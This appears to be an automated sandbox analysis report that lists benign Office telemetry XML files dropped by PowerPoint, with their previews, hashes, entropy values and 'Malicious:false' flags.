                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170035" V="1" DC="SM" EN="Office.Graphics.FormatPainterUsage" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="axum5" A="axum6 axum7 beg4t" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="Action" />.. <F N="from" />.. <F N="to" />.. </S>.. </G>.. <C T="W" I="0" O="false" N="Action">.. <S T="1" F="Action" />.. </C>.. <C T="W" I="1" O="false" N="Source">.. <S T="1" F="from" />.. </C>.. <C T="W" I="2" O="false" N="Destination">.. <S T="1" F="to" />.. </C>.. <C T="U32" I="3" O="false" N="Count">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1169
                                                                                                                              Entropy (8bit):4.822742548829354
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dt9lHAvcrtr5rxrq2rWNKAnOQ8jH15TDkD:ct9lgvcBdle2iNKAkFkD
                                                                                                                              MD5:92B3092F11F34A6511540F647FAA8087
                                                                                                                              SHA1:860944E730B98C8905221A4C6EAB897DC162AF0B
                                                                                                                              SHA-256:4C5E1CC1DEB2E26981A4F29F293878B602C252AA94AB355F161DA75F8227998B
                                                                                                                              SHA-512:83FB269453BB8F69163B45462650FDABF7095FF036E81A946E3B1FEF85AA75B5A4BE198FAE14A4EDEB24880532C6B9E16A6E533A96107D497B176B160DAC799E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170037" V="1" DC="SM" EN="Office.Graphics.GvisIgxBulletCustomization" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdld4" />.. <UTS T="2" Id="bdld5" />.. <UTS T="3" Id="bdld6" />.. <UTS T="4" Id="bdld7" />.. <UTS T="5" Id="bdld8" />.. <A T="6" E="TelemetryShutdown" />.. <A T="7" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="true" N="BulletSizeCustomizationCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="true" N="BulletColorCustomizationCount">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="U32" I="2" O="true" N="NumberBulletCustomizationCount">.. <C>.. <S T="3" />.. </C>.. </C>.. <C T="U32" I="3" O="true" N="PictureBulletCustomizationCount">.. <C>.. <S T="4" />.. </C>.. </C>.. <C T="U32" I="4" O="true" N="CharBulletCustomizationCount">.. <C>.. <S T="5" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):702
                                                                                                                              Entropy (8bit):5.0149827785161785
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSFiCkoCAvQier1eruerJVCGONan+i0GnNant9PGoNaNOS5csu:2dCilHAvcrgrBrIc/Wn
                                                                                                                              MD5:698394FDF95BC924F1E1D2F5150FA82C
                                                                                                                              SHA1:7974D0E69C1C5E7B0EE89FE1268C6224BD7D048A
                                                                                                                              SHA-256:797E45A338DA5158135564FA1A8328E6700BF1F25BEAE9589B9AE78E166243A0
                                                                                                                              SHA-512:E9D5C61CC943081E5B82FAD68CC4103741E80946E470783C9E9EC22E9A04365EC99E9622DB53D43FC2188A51D13CB3CBCD5181DCC1C6DD5BF74D16D171777E4D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170038" V="0" DC="SM" EN="Office.Graphics.InkPointerMode" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bfslj" />.. <UTS T="2" Id="bfmm5" />.. <UTS T="3" Id="bfmm6" />.. </S>.. <C T="B" I="0" O="true" N="ExcelPenPointerMode">.. <S T="1" F="PenPointerMode" M="Ignore" />.. </C>.. <C T="B" I="1" O="true" N="PPTPenPointerMode">.. <S T="2" F="PenPointerMode" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="WordPenPointerMode">.. <S T="3" F="PenPointerMode" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):600
                                                                                                                              Entropy (8bit):4.9230249967709785
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSICkoCAvQij+u/qNO8yX/c//kpONUVrGnNaNOjsu:2dPlHAvAuyBG01
                                                                                                                              MD5:8E08A4A4434C6709EBDA69D7BD93223F
                                                                                                                              SHA1:0DAEA87E70E8EF0AC4C83E6087AD6F551ECFAC5A
                                                                                                                              SHA-256:1287C8686BB0382C84E9F9A11430B0995C48659037EC0430B668E7EC190F5493
                                                                                                                              SHA-512:9F309FA4599119D2CBFB56C58BD73D58213E806AF3EC27A8909101C2D9455760CAAF7F49CB0DEB233039E7D85B5A67C432EA917A3E8E2D60330D308AFF1770DE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170039" V="0" DC="SM" EN="Office.Graphics.InkPointerModeForFork" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UCSS T="1" C="Office Ink Object" S="Medium" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_TagId" />.. </L>.. <R>.. <V V="0000" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="B" I="0" O="true" N="PenPointerMode">.. <S T="2" F="PenPointerMode" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):389
                                                                                                                              Entropy (8bit):5.168654440867369
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mR2mkULl8qb0c7oCDLChvRCUHperhztEnPNVlr8L7C/BLlW9NOn2sby:TMHdSRNlCkoCAvQier2V+uVlaNO2su
                                                                                                                              MD5:3F1320444F09DC47C7D53EE61A3BC164
                                                                                                                              SHA1:DF4B5D280DCC4D4918B0B70C3CD86AF7EB1D0ABE
                                                                                                                              SHA-256:3CB08AFA5BD579158FF88CEE805780D30A9B5E2271F1A79B723A3127313D2F96
                                                                                                                              SHA-512:F47EE9533F935B9656F2E2F7DC98C034E96364EC481D358BA37D69041BC92B942180763044739A61EBD2B87ABDCB1B789F1E4CAF99720CBB136D7FE1FEB2F0D0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170040" V="0" DC="SM" EN="Office.Graphics.PenSelectMode" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="pen99" />.. </S>.. <C T="B" I="0" O="true" N="PenSelectMode">.. <S T="1" F="PenSelectMode" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):755
                                                                                                                              Entropy (8bit):4.845207902572627
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSpkoCAvQJerQ1sN+u/xH/OlKbX/c//8pONwsAlaOXyKQp9lSCNOjsu:2d/HAv3rQK8uRZua
                                                                                                                              MD5:FF35978853CFE18A3DB88D45ACA46F01
                                                                                                                              SHA1:B5C22FCF47755CD7953FFE0AE23B986C0FDA576C
                                                                                                                              SHA-256:96A9537135511939C2EADEE3F1D04346BE6621C6B8759ADCDBE94B045F292C4D
                                                                                                                              SHA-512:EAB0E56AC661ECA641345BD6F7F0C3553AD8B3D275470FF42ABF05763C611E9C0CE8A38C0F52B20BD4D07078367B9AACF1B97776553AE7F48BD9E717779B020A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170041" V="2" DC="SM" EN="Office.Graphics.ARCWaitTime" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="bfi37" A="bfi38" />.. <F T="2">.. <O T="GT">.. <L>.. <S T="1" F="TimeElapsedMS" />.. </L>.. <R>.. <V V="100" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="true" N="TagID">.. <S T="2" F="ULS_TagId" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="ElapsedTime">.. <S T="2" F="TimeElapsedMS" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Result">.. <S T="2" F="Result" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):715
                                                                                                                              Entropy (8bit):5.037196898720328
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS0ttokoCAvQier8NXFJiQj5szgxCfhxSn+zghOhhrIpygxocXHaSMNO5AHN9:2dhtdHAvcrCv5lcNdSurzw07
                                                                                                                              MD5:36BEFE950748CEEB84509AAAD0E1417C
                                                                                                                              SHA1:83234D07FD0FF74AD2522E8F40EDA5CB287F4501
                                                                                                                              SHA-256:9383D029320A97925642D00955D451109346A50EA6595CEACA8FCAFCDE6E6284
                                                                                                                              SHA-512:44CA372484414A2A51831DFF426C4BA49A19FF0EDB44A3E414FEC1778FBC56F3EC7003C1C4DAA6DB4C3102FD9616D02ED3572BCEC5FFF17E881AD36156E1DC99
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170042" V="4" DC="SM" EN="Office.Graphics.GFXFilterTypeRequested" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhlwe" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="W" I="0" O="true" N="FilterType">.. <S T="1" F="FilterTypeRequested" />.. </C>.. <C T="B" I="1" O="true" N="FilterAllowed">.. <S T="1" F="FilterAllowed" M="Ignore" />.. </C>.. <C T="U32" I="2" O="false" N="FilterTypeCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):473
                                                                                                                              Entropy (8bit):5.07230516973807
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSIUpkoCAvQJer3glVZ6C7cXHaSMNO2su:2dXRHAv3rwPj7cK
                                                                                                                              MD5:AF187181F83172CD89F38E1DF195ABD8
                                                                                                                              SHA1:270C498B965D550DA3071CF8E0C0EE50ED5402E4
                                                                                                                              SHA-256:21E1AEE38B930E82263F44F6AADC9975630EF933941562DCFC7465C4F5FB1B53
                                                                                                                              SHA-512:DEE72DAB36A4EC86FA84A1CA7A25725A05E8373AB89EEE44BC1B4AAC5443D68D0F76C46905B71F0C8FFCE3E1C77033A3AA441C8D9748A89819EABA3E2B2BA47C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170043" V="1" DC="SM" EN="Office.Graphics.CacheFull" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="bgyr9" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="false" N="CacheFullCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):519
                                                                                                                              Entropy (8bit):5.066486734278268
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSVqaIkoCAvQier2XFJiQjF0uXHaSMNO5AHNUlu:2dFMHAvcrmv5W7
                                                                                                                              MD5:F98CD51CFC2E4B9A685E12A0F62109B9
                                                                                                                              SHA1:0C5F7DAD7195931B74DB9127495EA8B9766FA185
                                                                                                                              SHA-256:A978C9E902A0A7FCCDCA51AFA14252367697DFFAE32623F8FDAF4762E3FB20B6
                                                                                                                              SHA-512:BDC1EAEFD43AC3C2348DA61EFA45EA3BD967475959984B7BB63CEC65574B84ADD5CB46E27EDF7037BAC1C497C5DAF2D3F5063974B6B03380F44CED5AD5927A8B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170044" V="4" DC="SM" EN="Office.Graphics.GfxEPSFilterInsert" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhg21" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="EPSFilterInsert">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):578
                                                                                                                              Entropy (8bit):5.162787367717548
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSZfkoCAvQierHBuV9NkW+n+uL73nt9t8SfCdNO2su:2dqMHAvcrH46W8qq4
                                                                                                                              MD5:FC85AF5E55A9EF3838DA4C1D0C94E625
                                                                                                                              SHA1:0A58327848F5BD33550B82FD6FAD9DF67B4D287B
                                                                                                                              SHA-256:2E9D90219EBCD88768E0E70B7AC5C45C3088C8EE21AB2FDB104C4F50DC40787D
                                                                                                                              SHA-512:10CDC7CFDAEC6603B83C00C4CFD97E555B1E1563D0F4226A47D29615ED87165FA38B14E2BFDC1353523BD2A616E3DB3F8147F72D2434C102FDDC9FE2FEC88835
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170048" V="0" DC="SM" EN="Office.Graphics.BGRWithBrush" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bi7up" />.. </S>.. <C T="B" I="0" O="true" N="BrushExperience">.. <S T="1" F="Brush Experience" />.. </C>.. <C T="B" I="1" O="true" N="BgRemovalUsingDrag">.. <S T="1" F="Bg Removal Using Drag" />.. </C>.. <C T="B" I="2" O="true" N="ChangesAccepted">.. <S T="1" F="Changes Accepted" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2976
                                                                                                                              Entropy (8bit):4.9871689157577395
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dtvxIHAvcrANSWvHuEj2Kd10gwRedOQpgMSgenvtNc1gdE/Y7uT3w8fE4WUEHWb:cpxIgvc6gAIqUj1lgcbl2GMwLfw
                                                                                                                              MD5:D9820344DFB41D5E653DE1BB499D3466
                                                                                                                              SHA1:F550017D674AA71A362FEE7285C408D2B84E36C1
                                                                                                                              SHA-256:F9493245AA4B8678E2B1A630947621C0F0B14DCB3140056060CBF2DC59A04D19
                                                                                                                              SHA-512:A5420888F9F6CA00EFF302165847FA757655EC14D52DF9473268299B050DB872A4844A997090B3B85F165A4D27D39443308B70BADDD7C402589047C0B7AA90C0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170050" V="2" DC="SM" EN="Office.Graphics.SVGStats" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjjme" />.. </S>.. <C T="U32" I="0" O="true" N="SVGFileCount">.. <S T="1" F="SVG_File_Count" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="TotalTagCount">.. <S T="1" F="SVG_Elements_Total_Count" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="FilterBlendCount">.. <S T="1" F="SVG_Filter_Blend_Total_Count" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="FilterMatrixCount">.. <S T="1" F="SVG_Filter_ColorMatrix_Total_Count" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="ComponentTransferCount">.. <S T="1" F="SVG_Filter_ComponentTransfer_Total_Count" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="CompositeCount">.. <S T="1" F="SVG_Filter_Composite_Total_Count" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):607
                                                                                                                              Entropy (8bit):5.000787995445468
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSnGqkoCAvQJerHhXFJiQjXlVZ6iDXHaSMNO5AHNUlu:2dTHAv3rHtv5rPX07
                                                                                                                              MD5:78A79CE38068ED010B127894D812D8FF
                                                                                                                              SHA1:B3E41FE1E0B3DBDBC08D8065E130CDDC442D9DA9
                                                                                                                              SHA-256:BF23CD0D99C0E63E852431AEBE61EDE572AED2B96D0457BD8E7C3D566E9E0CA5
                                                                                                                              SHA-512:9ED98C17435700B7CC4271AB787930046412F85FF39B667BB6E954A9FA0B0138BF061473A88E1D6CF2BCE10A44AB7E1D2361307E89706B100B333F3FCEE5C911
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170052" V="2" DC="SM" EN="Office.Graphics.EvictedCache" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="bi90m" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="false" N="EvictedCacheCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):453
                                                                                                                              Entropy (8bit):5.144547003197568
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSfrZ7koCAvQJerE5G+EpbOSZtM4lNO2su:2dgrqHAv3rlL
                                                                                                                              MD5:02D53336240281CF7F5E999BEACCD121
                                                                                                                              SHA1:5177C37E53E14BA25A97C4F558E7887EAAB9E467
                                                                                                                              SHA-256:D243CF46E5EAF56A43BCA31E8D254AD690BE084210F3D2566AE8E9D071205996
                                                                                                                              SHA-512:98CE24D47AB99A16C3AD56B5AA02119BE2E10DB76C3377636BD3A99B0CE2A65618DFF41CC573BE8DF1F2C0038E9B2C4A81A96B260ED59D535E000E5E61412E27
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170053" V="1" DC="SM" EN="Office.Graphics.SpriteMem" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="bkj8w" />.. </S>.. <C T="U64" I="0" O="true" N="CurrentSpriteMem">.. <S T="1" F="Current" />.. </C>.. <C T="U64" I="1" O="true" N="MaxSpriteMem">.. <S T="1" F="Peak" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):627
                                                                                                                              Entropy (8bit):5.155859118419826
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSsTKpkoCAvQqAQ+erhjG+EpbOt6ZCiuXAedy9z/s+NO2su:2dZKiHAvHrhOyjk0+
                                                                                                                              MD5:68EEB4EB84FDC7C0799FD029B4F85E21
                                                                                                                              SHA1:C83A27C600C538B690862C0AC877030948C96651
                                                                                                                              SHA-256:0F2FCDF329E471C82724E5C3EB0831CCF64091EBD39C5CEB91EB717E3C64F79B
                                                                                                                              SHA-512:2E8D435983631AF29CEB2C03BA744472CF60F1E932A6BEF2F0680FD1B78039F0C217D6BF20AA5F2D7AE0F7315A7E1301BD4231BF83E4078C9DC1000C7C6F61FF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170054" V="1" DC="SM" EN="Office.Graphics.SpriteMemCorrupt" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DL="B" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="bkj8v" />.. </S>.. <C T="U64" I="0" O="true" N="CurrentSpriteMem">.. <S T="1" F="Current sprite memory in use" />.. </C>.. <C T="U64" I="1" O="true" N="SpriteMemToRemove">.. <S T="1" F="Amount to remove" />.. </C>.. <C T="W" I="2" O="true" N="Function">.. <S T="1" F="Called from function : " />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):653
                                                                                                                              Entropy (8bit):5.165545586320683
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSBIVKpkoCAvQierDKvOUddLz/St9dBXeQXMNsAn/3ZMNO2su:2d6IgiHAvcrev///gjc1u
                                                                                                                              MD5:0EAF5B7124C94B6EB648039C4C1231CA
                                                                                                                              SHA1:996B2AB77570DDF9574F6B0D3F93CCB4BD5CD05B
                                                                                                                              SHA-256:AB5DF448EC06EDE239CE86F5FC8A6D155349B1451EE99065E39361E39C3DD1D7
                                                                                                                              SHA-512:03919EB4275DE2D7F21C983160B2BC5A8042079E688D449E5EC2A682BC840C1A3B43E08EEC7C937AEA2B460AB12DA3A96420CBA42D9EA7350AB06724F457C745
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170056" V="0" DC="SM" EN="Office.Graphics.InvalidCharacterPos" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bmw6j" A="bmw6k" />.. </S>.. <C T="W" I="0" O="false" N="TagID">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="W" I="1" O="true" N="Function">.. <S T="1" F="Function" />.. </C>.. <C T="I32" I="2" O="true" N="TextBodyLength">.. <S T="1" F="TextBody Length" />.. </C>.. <C T="I32" I="3" O="true" N="RightCharPosition">.. <S T="1" F="right.m_charPos" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):523
                                                                                                                              Entropy (8bit):5.057892482651669
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSgVekoCAvQiergOXFJiQjFDlcXHaSMNO5AHNUlu:2dFVhHAvcrfv5Xc07
                                                                                                                              MD5:4D23F684387F1A6DE0221BA674B0ED49
                                                                                                                              SHA1:2AEDB7C64BE5A35CEAFCC343C3C125B444013910
                                                                                                                              SHA-256:4547ACF1AEC0B426534454F589B4B36CCA67E2CD147DD7CFFBB4FE18E2F45A03
                                                                                                                              SHA-512:BA7B0B98C5A65DEC20826E6A6D74870A4A6B0B3131DBFF70BE3D0E18077DA00D0DF80EC9C4A9C45DD8EFDCCD23CCB3D8264BF030304A763F6394FB14BA4DD625
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170058" V="1" DC="SM" EN="Office.Graphics.ShapeInteraction" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bopvj" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="ShapeInteractionCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):525
                                                                                                                              Entropy (8bit):5.0963759077169914
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS1za+7koCAvQierWXFJiQjFk6RXHaSMNO5AHNUlu:2do4HAvcrGv5j07
                                                                                                                              MD5:CC333796EF5E702872FCA9550F856C9D
                                                                                                                              SHA1:85AF74847FA2C8EDCAA2CF92E80C06C2F8059F14
                                                                                                                              SHA-256:A37682E3B7DA4C1E530D73B7CBB207469EDB96475CFEFDE09427DB48BCADD711
                                                                                                                              SHA-512:2795F5BD6E073A60DD8B49E02F0E24742E1CE301C3D971F88DEEB135B1D57CEFBB11EFF7623DD1F246CDFEFD8E9CF0BAE623311E972FC91FE83735F29690AAD7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170059" V="1" DC="SM" EN="Office.Graphics.BarrelButtonLasso" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bopvk" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="BarrelButtonLassoCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):391
                                                                                                                              Entropy (8bit):5.241455521463736
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mLHykZTqb0c7oCDLChvRCtRMFpAQUHperhF7dxkUSwNOn2sby:TMHdSprkoCAvQqAQierfJOUdNO2su
                                                                                                                              MD5:A488C50B92123B508760CC3EB36D10EE
                                                                                                                              SHA1:B0B8E48BA0825D2BB9A085A7FA2DBB097D5226C6
